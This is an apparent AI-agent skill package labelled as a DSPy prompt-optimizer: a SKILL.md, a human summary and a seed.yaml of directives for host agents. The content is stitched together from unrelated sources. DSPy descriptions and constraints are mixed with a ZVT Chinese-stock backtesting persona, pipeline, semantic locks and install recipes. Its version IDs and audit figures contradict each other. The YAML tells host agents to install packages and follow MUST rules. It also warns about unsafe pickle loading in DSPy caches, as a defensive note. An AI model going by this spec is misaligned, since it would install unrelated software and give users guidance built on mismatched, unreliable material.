  - 'Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage
    is thin)'
  - 'Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare,
    or qmt (broker)?'
  - 'Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?'
  - 'Time range: start_timestamp and end_timestamp for backtest period'
  - 'Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?'
  locale_rendering:
    instruction: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona
      (direct, frank, mildly snarky, knows limits).
    preserve_verbatim:
    - BD-IDs
    - SL-IDs
    - UC-IDs
    - finance-C-IDs
    - class_names
    - function_names
    - file_paths
    - numeric_thresholds

ClawHub Coding Backend+2

T@clawhub-tangweigang-jpg-8679fec286

Dspy Prompt Optimizer

Skill

DSPy：把 LLM 程序写成可组合 Module + 声明式 Signature 的 Python 框架。通过 14 个 teleprompter（optimizer）从 train + dev 集自动编译 prompt 与 few-shot demo。 DSPy: a Python framework for...

---
name: dspy-prompt-optimizer
description: |-
  DSPy：把 LLM 程序写成可组合 Module + 声明式 Signature 的 Python 框架。通过 14 个 teleprompter（optimizer）从 train + dev 集自动编译 prompt 与 few-shot demo。
  DSPy: a Python framework for building LLM programs as composable Modules with declarative Signatures. 14 teleprompter (optimizer) classes auto-compile prompts and few-shot demos from train + dev sets. LM access is unified via LiteLLM; 2-tier cache (LRU + diskcache).
license: MIT-0
compatibility: AI engineering knowledge skill — host AI consumes seed.yaml directly. No installation required.
metadata:
  version: "v0.1.0"
  blueprint_id: "finance-bp-137"
  blueprint_source: "stanfordnlp/dspy"
  blueprint_commit: "da4ae1941d551fdc09d7d1bfbb6f7c01b96063a8"
  category: ai-engineering
  doramagic_url: "https://doramagic.ai/zh/crystal/dspy-prompt-optimizer"
  openclaw:
    skillKey: dspy-prompt-optimizer
    category: ai-engineering
    primaryEnv: knowledge
---
# 这个 skill 适合什么用户？能做哪些任务？

## 概览

DSPy 是把 LLM 程序写成可组合 Module + 声明式 Signature 的 Python 框架（github.com/stanfordnlp/dspy）。可插拔 Adapter 格式化消息和解析响应；LM 客户端层包装 LiteLLM 提供统一 provider 访问；14 个 teleprompter （optimizer）类从 train + dev 集自动编译 prompt 和 few-shot demo。

下层是 2 层缓存（LRUCache 内存 + diskcache FanoutCache 磁盘）和 3 层遥测（Settings.trace、Module.hist...

**Doramagic 晶体页**: https://doramagic.ai/zh/crystal/dspy-prompt-optimizer

## 知识规模

- **44 条约束** (8 fatal + 36 non-fatal)
- 上游源码: `stanfordnlp/dspy` @ commit `da4ae194`
- 蓝图 ID: `finance-bp-137`

## 用法

Host AI（Claude Code / Cursor / OpenClaw）读 `references/seed.yaml`，按其中的：
- `intent_router` 匹配用户意图
- `architecture` 理解项目架构
- `constraints` 应用 anti-pattern 约束
- `business_decisions` 参考核心设计决策

## FAQ 摘要

### 这个 skill 适合什么用户？能做哪些任务？
适合需要把 LLM 流水线工程化的研究员和工程师：用 Signature 替代手写prompt、用 teleprompter（如 MIPROv2、BootstrapFewShot）从数据自动优化 prompt + few-shot。覆盖 RAG / agent / 分类 / 抽取等用例。访问 doramagic.ai/r/dspy 查看完整说明。

### 需要准备什么环境？依赖什么？
Python 3.10+，至少一个 LM provider 通过 LiteLLM 访问（默认接受 'provider/model' 字符串如 'openai/gpt-4o-mini'）；可写磁盘用于 ~/.dspy_cache（或 DSPY_CACHEDIR 覆盖）。MIPROv2 离散搜索可选 optuna（懒加载）；asyncify 可选 anyio。

### 会踩哪些坑？这个 skill 怎么防护？
本 skill 内置 44 条约束（8 条 fatal）。CRITICAL 安全坑：(1) 默认 Cache(restrict_pickle=False) + diskcache pickle.load 在被污染的 ~/.dspy_cache shard 上 = RCE，无用户 opt-in；(2) MIPROv2 估算 LM 调用数但不在超预算时中止（静默失控成本）；

---

完整文档: 见 `references/seed.yaml` (v6.1 schema). 浏览页: https://doramagic.ai/zh/crystal/dspy-prompt-optimizer

FILE:human_summary.md
# finance-bp-137-v6.1 — Human Summary

**Persona**: Doraemon

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- ReAct Agent (multi-tool)
- Multi-Hop Search
- RAG with ChainOfThought
- A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
- End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader
- Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
- Index composition data collection (SZ1000, SZ2000) with EM recorder

## What I Auto-Fetch

- ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
- Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
- Fatal constraints (finance-C-*) relevant to your target strategy type
- Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY
- Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
- Provider-specific recorder class names and required class attributes

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Locale Rendering

**Instruction**: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona (direct, frank, mildly snarky, knows limits).

**Preserve verbatim**: BD-IDs, SL-IDs, UC-IDs, finance-C-IDs, class_names, function_names, file_paths, numeric_thresholds

---

*Generated by compile_crystal_skeleton.py v5.0 for finance-bp-137-v6.1*
*All content is English source — agent translates on first user contact.*
FILE:references/seed.yaml
meta:
  id: finance-bp-137-v6.1
  version: v6.1
  blueprint_id: finance-bp-137
  sop_version: crystal-compilation-v6.1
  source_language: en
  compiled_at: '2026-04-25T09:19:03.880744+00:00'
  target_host: openclaw
  authoritative_artifact:
    primary: seed.yaml
    non_authoritative_derivatives:
    - SKILL.md (host-generated summary, may lag)
    - HEARTBEAT.md (host telemetry)
    - memory/*.md (host conversational memory)
    rule: On any behavioral decision (preconditions check, OV assertion, EQ rule firing, spec_lock verification), agents MUST
      re-read seed.yaml. Derivatives are for UI display only and may be out-of-date.
  execution_protocol:
    install_trigger:
    - Execute resources.host_adapter.install_recipes[] in declared order
    - Verify each package with import check before proceeding
    execute_trigger: When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)
    on_execute:
    - Reload seed.yaml (do not rely on SKILL.md or cached summaries)
    - Run preconditions[] in declared order; halt on first fatal failure with on_fail message to user
    - Enter context_state_machine.CA1_MEMORY_CHECKED state
    - Evaluate evidence_quality.enforcement_rules[]; prepend user_disclosure_template
    - Translate user_facing_fields to user locale per locale_contract
    workspace_resolution:
      scripts_path: '{host_workspace}/scripts/'
      skills_path: '{host_workspace}/skills/'
      trace_path: '{host_workspace}/.trace/'
locale_contract:
  source_language: en
  user_facing_fields:
  - human_summary.what_i_can_do.tagline
  - human_summary.what_i_can_do.use_cases[]
  - human_summary.what_i_auto_fetch[]
  - human_summary.what_i_ask_you[]
  - evidence_quality.user_disclosure_template
  - post_install_notice.message_template.positioning
  - post_install_notice.message_template.capability_catalog.groups[].name
  - post_install_notice.message_template.capability_catalog.groups[].description
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].name
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].short_description
  - post_install_notice.message_template.call_to_action
  - post_install_notice.message_template.featured_entries[].beginner_prompt
  - post_install_notice.message_template.more_info_hint
  - preconditions[].description
  - preconditions[].on_fail
  - intent_router.uc_entries[].name
  - intent_router.uc_entries[].ambiguity_question
  - architecture.pipeline
  - architecture.stages[].narrative.does_what
  - architecture.stages[].narrative.key_decisions
  - architecture.stages[].narrative.common_pitfalls
  - constraints.fatal[].consequence
  - constraints.regular[].consequence
  - output_validator.assertions[].failure_message
  - acceptance.hard_gates[].on_fail
  - skill_crystallization.action
  locale_detection_order:
  - explicit_user_declaration
  - first_message_language
  - system_locale
  translation_enforcement:
    trigger: on_first_user_message
    action: Render user_facing_fields in detected locale, preserving all IDs (BD-/SL-/UC-/finance-C-) and code identifiers
      verbatim
    violation_code: LOCALE-01
    violation_signal: User receives untranslated English Human Summary when detected locale != en
evidence_quality:
  declared:
    evidence_coverage_ratio: null
    evidence_verify_ratio: null
    evidence_invalid: 0
    evidence_verified: null
    evidence_auto_fixed: null
    audit_coverage: 20 finance-universal not_applicable + 8 AIL warn/fail + 5 DAT warn/fail = 33 items reviewed across applicable
      scope
    audit_pass_rate: 0/13 (0% applicable items pass; 13 warn/fail/missing capture the architectural boundaries and divergences
      worth surfacing as constraints — consistent with this being a framework that "provides hooks not enforcement")
    audit_fail_total: 0
    audit_finance_universal:
      pass: 0
      warn: 0
      fail: 0
    audit_subdomain_totals:
      pass: 0
      warn: 0
      fail: 0
  enforcement_rules:
  - id: EQ-01
    trigger: declared.evidence_verify_ratio < 0.5
    action: MUST invoke traceback lookup for all cited BD-IDs in output before emitting business code — read LATEST.yaml sections
      for each BD referenced
    violation_code: EQ-01-V
    violation_signal: Generated script references BD-IDs but no tool_call to read LATEST.yaml preceded code generation
  - id: EQ-02
    trigger: always
    action: MUST prepend user_disclosure_template (translated to user locale) to first user-facing response
    violation_code: EQ-02-V
    violation_signal: First agent response to user does not contain audit warning phrase
  user_disclosure_template: '[QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-137. Evidence verify ratio
    = 0.0% and audit fail total = 0. Generated results may have uncaptured requirement gaps. Verify critical decisions against
    source files (LATEST.yaml / LATEST.jsonl).'
traceback:
  source_files:
    blueprint: LATEST.yaml
    constraints: LATEST.jsonl
  mandatory_lookup_scenarios:
  - id: TB-01
    condition: Two constraints have apparently conflicting enforcement rules
    lookup_target: LATEST.jsonl — find both constraint IDs, compare `consequence` + `evidence_refs` to determine priority
  - id: TB-02
    condition: A business decision rationale is unclear or disputed
    lookup_target: LATEST.yaml — locate BD-ID under business_decisions, read `rationale` + `alternative_considered` fields
  - id: TB-03
    condition: evidence_invalid > 0 in evidence_quality.declared
    lookup_target: LATEST.yaml _enrich_meta — cross-check specific BD `evidence_refs` fields for invalid markers
  - id: TB-04
    condition: User asks where a rule comes from
    lookup_target: LATEST.jsonl — find constraint by ID, read `confidence.evidence_refs` for source file + line number
  - id: TB-05
    condition: Generated code does not match expected ZVT API behavior
    lookup_target: LATEST.yaml stages[].required_methods — verify method signature and evidence locator in source code
  degraded_lookup:
    no_fs_access: 'Ask the user to paste the relevant LATEST.yaml section or LATEST.jsonl lines for the BD-/finance-C- IDs
      in question. Crystal ID: finance-bp-137-v5.0.'
trace_schema:
  event_types:
  - precondition_check
  - spec_lock_check
  - evidence_rule_fired
  - evidence_rule_skipped
  - locale_translation_emitted
  - hard_gate_passed
  - hard_gate_failed
  - skill_emitted
  - false_completion_claim
preconditions:
- id: PC-01
  description: zvt package installed and importable
  check_command: python3 -c 'import zvt; print(zvt.__version__)'
  on_fail: 'Run: python3 -m pip install zvt  then re-run: python3 -m zvt.init_dirs to initialize data directories'
  severity: fatal
- id: PC-02
  description: K-data exists for target entities (required before backtesting)
  check_command: python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1);
    assert df is not None and len(df) > 0, 'No kdata found'"
  on_fail: 'Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000  (replace
    with your target entity IDs)'
  severity: fatal
  applies_to_uc: []
- id: PC-03
  description: ZVT data directory initialized (~/.zvt or ZVT_HOME)
  check_command: 'python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get(''ZVT_HOME'', Path.home()
    / ''.zvt'')); assert zvt_home.exists(), f''ZVT home not found: {zvt_home}''"'
  on_fail: 'Run: python3 -m zvt.init_dirs'
  severity: fatal
- id: PC-04
  description: SQLite write permission for ZVT data directory
  check_command: python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home()
    / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"
  on_fail: 'Check directory permissions: chmod u+w ~/.zvt  or set ZVT_HOME environment variable to a writable location'
  severity: warn
intent_router:
  uc_entries:
  - uc_id: UC-001
    name: RAG with ChainOfThought
    positive_terms:
    - RAG
    - retrieval
    - context
    - ChainOfThought
    data_domain: mixed
    negative_terms:
    - multi-hop
    - ReAct (tool-using agent)
    ambiguity_question: Multi-hop = >1 retrieval call; pure RAG here = 1 retrieve → 1 generate. ReAct chooses tools dynamically;
      RAG always retrieves first.
  - uc_id: UC-002
    name: Multi-Hop Search
    positive_terms:
    - multi-hop
    - HotPotQA
    - iterative retrieval
    - chained reasoning
    data_domain: mixed
    negative_terms:
    - RAG (single hop)
    ambiguity_question: Multi-hop = multiple retrieve→reason cycles; RAG = single cycle.
  - uc_id: UC-003
    name: ReAct Agent (multi-tool)
    positive_terms:
    - ReAct
    - agent
    - tool calling
    - trajectory
    data_domain: mixed
    negative_terms:
    - ChainOfThought (no tools)
    - RAG
    ambiguity_question: ReAct chooses tools dynamically; CoT just thinks; RAG always retrieves first.
  - uc_id: UC-004
    name: Classification with Literal output (Banking77 etc)
    positive_terms:
    - classification
    - Literal
    - label
    - text classification
    data_domain: mixed
    negative_terms:
    - entity extraction
    - free-form output
    ambiguity_question: Classification = bounded Literal[...]; extraction = structured output with multiple fields.
  - uc_id: UC-005
    name: Classification Finetuning (BootstrapFinetune)
    positive_terms:
    - finetune
    - BootstrapFinetune
    - distillation
    - small model
    data_domain: mixed
    negative_terms:
    - MIPROv2
    - in-context learning
    ambiguity_question: Finetune updates weights; MIPRO updates prompts only.
  - uc_id: UC-006
    name: Math Reasoning with GEPA (AIME / GSM8K)
    positive_terms:
    - math
    - AIME
    - GSM8K
    - GEPA
    - reasoning
    - reflective
    data_domain: mixed
    negative_terms:
    - MIPROv2 (no reflective feedback)
    ambiguity_question: GEPA needs textual feedback per example; MIPROv2 only needs scalar metric.
  - uc_id: UC-007
    name: Privacy-Conscious Delegation (PAPILLON)
    positive_terms:
    - privacy
    - PAPILLON
    - delegation
    - PII redaction
    data_domain: mixed
    negative_terms:
    - plain RAG
    ambiguity_question: PAPILLON = local-LM redact + remote-LM answer; standard RAG = remote retrieve + answer.
  - uc_id: UC-008
    name: Yahoo Finance ReAct Agent
    positive_terms:
    - finance
    - stock
    - Yahoo
    - ReAct
    - yfinance
    - news sentiment
    data_domain: market_data
    negative_terms:
    - RAG over financial corpus
    - backtest
    ambiguity_question: This is the ONLY explicitly finance-tagged tutorial. Anything that needs PIT data, calendars, or compliance
      must build outside dspy.
context_state_machine:
  states:
  - id: CA1_MEMORY_CHECKED
    entry: Task started
    exit: All memory queries attempted and recorded; memory_unavailable set if failed
    timeout: 30s — skip memory, mark memory_unavailable=true, proceed to CA2
  - id: CA2_GAPS_FILLED
    entry: CA1 complete
    exit: 'All FATAL-priority required inputs answered: target market (A-share/HK/US), data source, time range, strategy type'
    timeout: NOT skippable — FATAL inputs MUST be user-answered before proceeding
  - id: CA3_PATH_SELECTED
    entry: CA2 complete
    exit: intent_router matched single use case with confidence gap > 20% over next candidate, no data_domain ambiguity
    timeout: Trigger ambiguity_question for top-2 candidates, await user selection
  - id: CA4_EXECUTING
    entry: CA3 complete + user explicit confirmation received
    exit: All hard gates G1-Gn passed and output files written
    timeout: NOT skippable — user confirmation of execution path required
  enforcement: Code generation is PROHIBITED before CA4_EXECUTING. Any regression to earlier state MUST be announced to user.
    buy/sell ordering SL-01 check runs at CA4 entry.
spec_lock_registry:
  semantic_locks:
  - id: SL-01
    description: Execute sell orders before buy orders in every trading cycle
    locked_value: sell() called before buy() in each Trader.run() iteration
    violation_is: fatal
    source_bd_ids:
    - BD-018
  - id: SL-02
    description: Trading signals MUST use next-bar execution (no look-ahead)
    locked_value: due_timestamp = happen_timestamp + level.to_second()
    violation_is: fatal
    source_bd_ids:
    - BD-014
    - BD-025
  - id: SL-03
    description: Entity IDs MUST follow format entity_type_exchange_code
    locked_value: stock_sh_600000 | stockhk_hk_0700 | stockus_nasdaq_AAPL
    violation_is: fatal
    source_bd_ids: []
  - id: SL-04
    description: DataFrame index MUST be MultiIndex (entity_id, timestamp)
    locked_value: df.index.names == ['entity_id', 'timestamp']
    violation_is: fatal
    source_bd_ids: []
  - id: SL-05
    description: 'TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount'
    locked_value: XOR enforcement in trading/__init__.py:68
    violation_is: fatal
    source_bd_ids: []
  - id: SL-06
    description: 'filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION'
    locked_value: factor.py:475 order_type_flag mapping
    violation_is: fatal
    source_bd_ids: []
  - id: SL-07
    description: Transformer MUST run BEFORE Accumulator in factor pipeline
    locked_value: 'compute_result(): transform at :403 before accumulator at :409'
    violation_is: fatal
    source_bd_ids: []
  - id: SL-08
    description: 'MACD parameters locked: fast=12, slow=26, signal=9'
    locked_value: factors/algorithm.py:30 macd(slow=26, fast=12, n=9)
    violation_is: fatal
    source_bd_ids:
    - BD-036
  - id: SL-09
    description: 'Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001'
    locked_value: sim_account.py:25 SimAccountService default costs
    violation_is: warning
    source_bd_ids:
    - BD-029
  - id: SL-10
    description: A-share equity trading is T+1 (no same-day close of buy positions)
    locked_value: sim_account.available_long filters by trading_t
    violation_is: fatal
    source_bd_ids: []
  - id: SL-11
    description: Recorder subclass MUST define provider AND data_schema class attributes
    locked_value: contract/recorder.py:71 Meta; register_schema decorator
    violation_is: fatal
    source_bd_ids: []
  - id: SL-12
    description: Factor result_df MUST contain either 'filter_result' OR 'score_result' column
    locked_value: result_df.columns.intersection({'filter_result', 'score_result'}) non-empty
    violation_is: fatal
    source_bd_ids: []
  implementation_hints:
  - id: IH-01
    hint: 'Use AdjustType enum exactly: qfq (pre-adjust), hfq (post-adjust), bfq (none) — contract/__init__.py:121'
  - id: IH-02
    hint: For A-share kdata, default to hfq for long-term analysis (dividend-adjusted) — trader.py:538 StockTrader
  - id: IH-03
    hint: SQLite connection MUST use check_same_thread=False for multi-threaded recorders
  - id: IH-04
    hint: Accumulator state serialization uses JSON with custom encoder/decoder hooks — contract/base_service.py
  - id: IH-05
    hint: Factor.level MUST match TargetSelector.level (enforced at add_factor) — factors/target_selector.py:84
preservation_manifest:
  required_objects:
    business_decisions_count: 26
    fatal_constraints_count: 8
    non_fatal_constraints_count: 36
    use_cases_count: 8
    semantic_locks_count: 12
    preconditions_count: 4
    evidence_quality_rules_count: 2
    traceback_scenarios_count: 5
architecture:
  pipeline: data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization
  stages:
  - id: data_collection
    narrative:
      does_what: TimeSeriesDataRecorder and FixedCycleDataRecorder fetch OHLCV and fundamental data from providers (eastmoney,
        joinquant, baostock, akshare) and persist domain objects (Stock1dKdata, BalanceSheet) to SQLite via df_to_db().
      key_decisions: BD-002 chose evaluate_start_end_size_timestamps for incremental fetch (not full refresh) because comparing
        to get_latest_saved_record avoids redundant API calls; BD-003 chose get_data_map field transformation to keep domain
        schema provider-agnostic.
      common_pitfalls: 'Don''t forget SL-11: Recorder subclass MUST declare both provider and data_schema class attributes
        else initialization fails with assertion error; finance-C-001 fatal violation.'
    business_decisions: []
  - id: data_storage
    narrative:
      does_what: StorageBackend persists DataFrames to per-provider SQLite databases at {data_path}/{provider}/{provider}_{db_name}.db
        using path templates from _get_path_template; Mixin.record_data and Mixin.query_data provide uniform read/write interface.
      key_decisions: BD-004 chose StorageBackend abstraction (not hardcoded SQLite) to allow future cloud storage swap; BD-006
        derives db_name from data_schema __tablename__ for per-domain database isolation.
      common_pitfalls: SL-04 violation (wrong DataFrame index) causes factor pipeline failures downstream; always ensure df.index.names
        == ['entity_id', 'timestamp'] before calling record_data.
    business_decisions: []
  - id: factor_computation
    narrative:
      does_what: Factor.compute() applies Transformer (stateless, e.g. MacdTransformer) then Accumulator (stateful, e.g. MaStatsAccumulator)
        to produce filter_result or score_result columns; EntityStateService persists per-entity rolling state across batches.
      key_decisions: BD-007 chose Factor inheriting DataReader for composable data access; SL-08 locks MACD at (fast=12, slow=26,
        n=9) — chose standard Appel parameters not adaptive because interpretability matters for practitioners.
      common_pitfalls: 'SL-07: Transformer MUST run before Accumulator — swapping order causes NaN propagation; SL-12: result_df
        must contain filter_result OR score_result column or TargetSelector silently drops all signals.'
    business_decisions: []
  - id: target_selection
    narrative:
      does_what: TargetSelector.add_factor() registers Factor instances; get_targets() returns entity_ids passing threshold
        filter at a specific timestamp, enabling point-in-time historical backtesting without look-ahead.
      key_decisions: BD-012 chose registrable factor list (not hardcoded) for runtime customization; BD-013 chose timestamp-specific
        filtering not current-only because backtests need historical point-in-time correctness.
      common_pitfalls: Factor.level MUST match TargetSelector.level (IH-05); mismatched levels cause silent empty target lists
        that look like no signals but are actually level-mismatch bugs.
    business_decisions: []
  - id: trading_execution
    narrative:
      does_what: Trader.run() calls sell() before buy() each cycle, generates TradingSignals with due_timestamp = happen_timestamp
        + level.to_second() for next-bar execution, and applies on_profit_control() for stop-loss/take-profit before regular
        target selection.
      key_decisions: SL-01 locks sell-before-buy order because available_long check in sim_account depends on it — chose this
        over symmetric ordering to prevent implicit leverage; BD-039 chose long=AND/short=OR multi-level logic to reflect
        risk asymmetry.
      common_pitfalls: 'SL-02 violation (immediate execution instead of next-bar) introduces look-ahead bias and makes backtest
        results unreproducible in live trading; SL-10: A-share T+1 constraint — backtesting without it overstates returns.'
    business_decisions: []
  - id: visualization
    narrative:
      does_what: Drawer.draw() combines kline main chart with factor overlays and Rect annotations for entry/exit signals
        using Plotly; Drawable interface on Factor enables consistent chart rendering across data types.
      key_decisions: BD-019 chose drawer_rects subclass override for custom annotations not hardcoded markers — allows traders
        to define entry/exit visuals without modifying base drawing logic.
      common_pitfalls: draw_result=True by default (BD-055) is fine for development but set draw_result=False in production/headless
        environments to avoid Plotly server startup overhead.
    business_decisions: []
  - id: cross_cutting_concerns
    narrative:
      does_what: 'Invariants and utilities that span multiple pipeline stages — collected from 6 source groups: adapter_layer(2),
        cache_and_trace(5), cross_cutting(8), lm_client(2), module_composition(2), optimizer_teleprompter(7).'
      key_decisions: 26 BDs merged here because they apply to more than one main stage (e.g. algorithm helpers, default value
        choices, ordering contracts, error handling). Agent should inspect individual BD summaries and link back to affected
        main stages via shared IDs.
      common_pitfalls: Cross-cutting concerns frequently surface as bugs when changes to one main stage unintentionally break
        another. Check constraints referencing these BDs and verify invariants still hold after any stage-local modification.
    business_decisions:
    - id: BD-005
      type: B
      summary: ChatAdapter is the silent default when settings.adapter is None
    - id: BD-006
      type: B/BA
      summary: ChatAdapter auto-falls-back to JSONAdapter on ANY parse failure (except ContextWindowExceededError / already-JSON
        / use_json_adapter_fallback=False)
    - id: BD-010
      type: B/BA
      summary: Default disk cache 30 GB at ~/.dspy_cache (env override DSPY_CACHEDIR / DSPY_CACHE_LIMIT) — but ONLY for the
        global dspy.cache instance; user-instantiated Cache(...) constructor default is 10 MB
    - id: BD-011
      type: B/BA
      summary: Default Cache(restrict_pickle=False) — global cache uses unrestricted pickle.load via diskcache
    - id: BD-013
      type: B
      summary: Settings is a process-wide singleton with thread-local overrides via ContextVar
    - id: BD-014
      type: M
      summary: ParallelExecutor resubmits stragglers when ≤straggler_limit=3 items remain and one has run >timeout=120s
    - id: BD-015
      type: B/BA
      summary: Trace recording is opt-out (default trace=[], max_trace_size=10000)
    - id: BD-019
      type: missing
      summary: No token-cost cap at compile time — MIPROv2 estimator prints but does not gate
    - id: BD-020
      type: missing
      summary: No train/val overlap detection — bootstrap can leak labels into demos that re-appear in valset
    - id: BD-021
      type: missing
      summary: No demo-overfit detection inside Bootstrap — accepts any truthy metric on small trainsets
    - id: BD-022
      type: missing
      summary: No structured logging when ChatAdapter silently retries via JSONAdapter
    - id: BD-023
      type: missing
      summary: No provider/model upgrade compatibility check
    - id: BD-024
      type: missing
      summary: Reproducibility — seed coverage is partial (no torch seed, no LiteLLM retry seed)
    - id: BD-025
      type: missing
      summary: Multi-LM prediction-cost attribution — track_usage gives flat sum, no per-stage breakdown
    - id: BD-026
      type: missing
      summary: Async context isolation — contextvars don't cross asyncio.run_coroutine_threadsafe to a different loop
    - id: BD-008
      type: RC
      summary: OpenAI reasoning models (o-series, gpt-5) hard-required temperature=1.0 + max_tokens >= 16000 (regex enforced)
    - id: BD-009
      type: B
      summary: DSPy disables LiteLLM's cache (litellm.cache = None) at import time
    - id: BD-007
      type: B/BA
      summary: When n>1 and temperature is unset or ≤0.15, force config["temperature"]=0.7
    - id: BD-012
      type: B/BA
      summary: Predict.load_state strips api_base/base_url/model_list unless allow_unsafe_lm_state=True
    - id: BD-001
      type: B/BA
      summary: BootstrapFewShot defaults max_bootstrapped_demos=4, max_labeled_demos=16, max_rounds=1
    - id: BD-002
      type: B/M
      summary: BootstrapFewShot uses lm.copy(rollout_id=round_idx, temperature=1.0) for round_idx > 0 to bypass cache; round
        0 uses caller's LM unchanged
    - id: BD-003
      type: B/BA
      summary: MIPROv2 auto-mode silently truncates valset to 100/300/1000 (light/medium/heavy)
    - id: BD-004
      type: M
      summary: MIPROv2 trial budget = max(2*M*log2(N), 1.5*N) where M = predictors*2 (×1 if zero-shot)
    - id: BD-016
      type: B/M
      summary: Metric trace argument switches between scalar (eval) and bool (bootstrap) modes; in bootstrap mode without
        metric_threshold set, ANY truthy scalar succeeds (default metric_threshold=None)
    - id: BD-017
      type: B
      summary: Module.deepcopy is the standard for student/teacher separation (replaced reset_copy on Oct 28 2024 in BootstrapFewShot._prepare_student_and_teacher)
    - id: BD-018
      type: B
      summary: 14 teleprompters in dspy/teleprompt/__init__.py — exposed as one canonical surface
resources:
  packages:
  - name: pandas
    version_pin: ==1.5.3
  - name: numpy
    version_pin: ==1.24.4
  - name: matplotlib
    version_pin: '>=2'
  - name: requests
    version_pin: ==2.31.0
  - name: scipy
    version_pin: '>=1.3.0'
  - name: scikit-learn
    version_pin: '>1.4.2'
  - name: pytest
    version_pin: '>=8.3'
  strategy_scaffold:
    entry_point_name: run_backtest
    output_path: result.csv
    execution_mode: backtest
    conditional_entry_points:
      backtest:
        entry_point_name: run_backtest
        output_path: result.csv
      collector:
        entry_point_name: run_collector
        output_path: result.json
      factor:
        entry_point_name: run_factor
        output_path: result.parquet
      training:
        entry_point_name: run_training
        output_path: result.json
      serving:
        entry_point_name: run_server
        output_path: result.json
      research:
        entry_point_name: run_research
        output_path: result.json
    tail_template: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()  #\
      \ implement above\n    from validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\"\
      )\n# === END DO NOT MODIFY ==="
  host_adapter:
    target: openclaw
    timeout_seconds: 1800
    shell_operator_restriction: 'exec tool intercepts && / ; / | — never chain: ''pip install X && python Y''. Use separate
      exec calls.'
    install_recipes:
    - python3 -m pip install zvt
    credential_injection: JoinQuant/QMT credentials require user-side '!' prefix shell login. Never hardcode credentials in
      generated scripts.
    path_resolution: '{workspace} resolves to ~/.openclaw/workspace/doramagic at execution time.'
    file_io_tooling: Use openclaw 'write' tool for .py/.sql files; 'exec' tool for python3 /absolute/path/script.py (absolute
      paths only).
constraints:
  fatal:
  - id: dspy-C-001
    when: When configuring DSPy in any production / multi-tenant / shared-CI environment that points DSPY_CACHEDIR (or default
      ~/.dspy_cache) at a writable shared location
    action: call dspy.configure_cache(restrict_pickle=True) (and register safe_types as needed) so the global Cache instance
      routes diskcache reads through the restricted unpickler in dspy/clients/disk_serialization.py
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Default Cache(restrict_pickle=False) at clients/__init__.py:88 routes Cache.get() through diskcache pickle.load
      WITHOUT a restricted unpickler; a poisoned ~/.dspy_cache shard (CI shared volume, dependency confusion, multi-tenant
      host) triggers arbitrary code execution at fetch time with NO user opt-in
    stage_ids:
    - cache_and_trace
    derived_from_bd_id: BD-011
  - id: dspy-C-002
    when: When writing tutorials / SKILL configs / setup scripts that load saved DSPy programs or memory caches (BaseModule.load
      / dspy.load / Settings.load / Cache.load_memory_cache)
    action: recommend or default-set allow_pickle=True without documenting source provenance verification — every public .load(...)
      defaults allow_pickle=False; tutorials that flip the default normalize disabling the framework-side gate
    severity: fatal
    kind: claim_boundary
    modality: must_not
    consequence: BaseModule.load:268-271, dspy.load saving.py:39-40, Settings.load:298-315, Cache.load_memory_cache:201-206
      each gate cloudpickle.load behind allow_pickle=False default. A tutorial-recommended allow_pickle=True silently turns
      those gates into theater, enabling RCE via attacker-supplied .pkl bundles
    stage_ids:
    - cache_and_trace
    derived_from_bd_id: BD-011
  - id: dspy-C-003
    when: When launching MIPROv2 (or any prompt-optimization run) on a paid LM provider
    action: compute the cost ceiling explicitly from num_candidates, num_trials, num_predictors, and valset size BEFORE calling
      teleprompter.compile() — MIPROv2._estimate_lm_calls only PRINTS the estimate; there is no max_total_calls knob
    severity: fatal
    kind: operational_lesson
    modality: must
    consequence: Misconfigured auto='heavy' on 18 candidates × 10 predictors × 1000 valset can burn hundreds of dollars silently
      in 20 minutes — _estimate_lm_calls at mipro_optimizer_v2.py:355-401 only prints ANSI-colored estimates and returns strings;
      there is no raise / no abort if estimated > budget
    stage_ids:
    - optimizer_teleprompter
